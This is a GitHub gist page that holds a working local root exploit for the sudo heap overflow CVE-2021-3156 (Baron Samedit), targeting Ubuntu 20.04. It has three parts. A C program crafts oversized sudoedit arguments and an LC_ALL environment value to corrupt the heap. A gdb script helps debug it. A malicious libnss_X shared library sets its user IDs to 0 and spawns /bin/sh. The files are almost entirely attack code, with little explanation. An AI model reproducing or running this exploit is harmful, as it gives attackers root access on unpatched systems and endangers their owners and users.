Last active
August 9, 2021 02:44
-
-
Save WinMin/9607a076d847f5768f372988762638f9 to your computer and use it in GitHub Desktop.
CVE-2021-3156-exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <string.h> | |
/* | |
author: swing @ bestswngs@gmail.com | |
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a | |
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue | |
Ubuntu 20.04.1 LTS \n \l | |
*/ | |
#define REP0(X) | |
#define REP1(X) X, | |
#define REP2(X) REP1(X) X, | |
#define REP3(X) REP2(X) X, | |
#define REP4(X) REP3(X) X, | |
#define REP5(X) REP4(X) X, | |
#define REP6(X) REP5(X) X, | |
#define REP7(X) REP6(X) X, | |
#define REP8(X) REP7(X) X, | |
#define REP9(X) REP8(X) X, | |
#define REP10(X) REP9(X) X, | |
#define REP100(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) | |
#define REP1000(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) | |
int main(){ | |
int obufsz = 0x190; | |
char obuf[obufsz]; | |
memset(obuf, 'B', sizeof(obuf)); | |
obuf[obufsz-2] = 0x5c; | |
obuf[obufsz-1] = 0x00; | |
char env_cont[0x1000]; | |
char env_val[0x1000]; | |
int env_valsz = 0xd0; | |
memset(env_val,'Q',8); | |
memset(env_val+8,'A',env_valsz-8); | |
env_val[env_valsz] = '\0'; | |
sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val); | |
char *args[] = { | |
"/usr/bin/sudoedit", | |
"-s", | |
obuf, | |
"\\", | |
NULL | |
}; | |
int PAD1SZ = 8; | |
char pad1[PAD1SZ] ; | |
memset(pad1, 'C', sizeof(pad1)); | |
pad1[PAD1SZ-2]= 0x5c; | |
pad1[PAD1SZ-1]= 0x00; | |
char *extra_args[] = { | |
pad1, | |
REP1000("\\") | |
"AAA\\", | |
REP100("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP7("\\") | |
"X/X\\", | |
"a", | |
env_cont, | |
NULL, | |
}; | |
execve(args[0], args, extra_args); | |
// execvpe("./sudoedit", args, extra_args); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# gcc CVE-2021-3156-exploit.c -o exploit | |
# gdb ./exploit -x gdbscript | |
catch exec | |
set breakpoint pending on | |
set follow-exec-mode new | |
r | |
b free if $r15==0xc && $r8==0 | |
b __libc_dlopen_mode |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <unistd.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/* | |
mkdir libnss_X | |
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2 | |
*/ | |
static void __attribute__ ((constructor)) _init(void); | |
static void _init(void) { | |
printf("[+] getroot!\n"); | |
setuid(0); seteuid(0); setgid(0); setegid(0); | |
static char *a_argv[] = { "sh", NULL }; | |
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; | |
execv("/bin/sh", a_argv); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment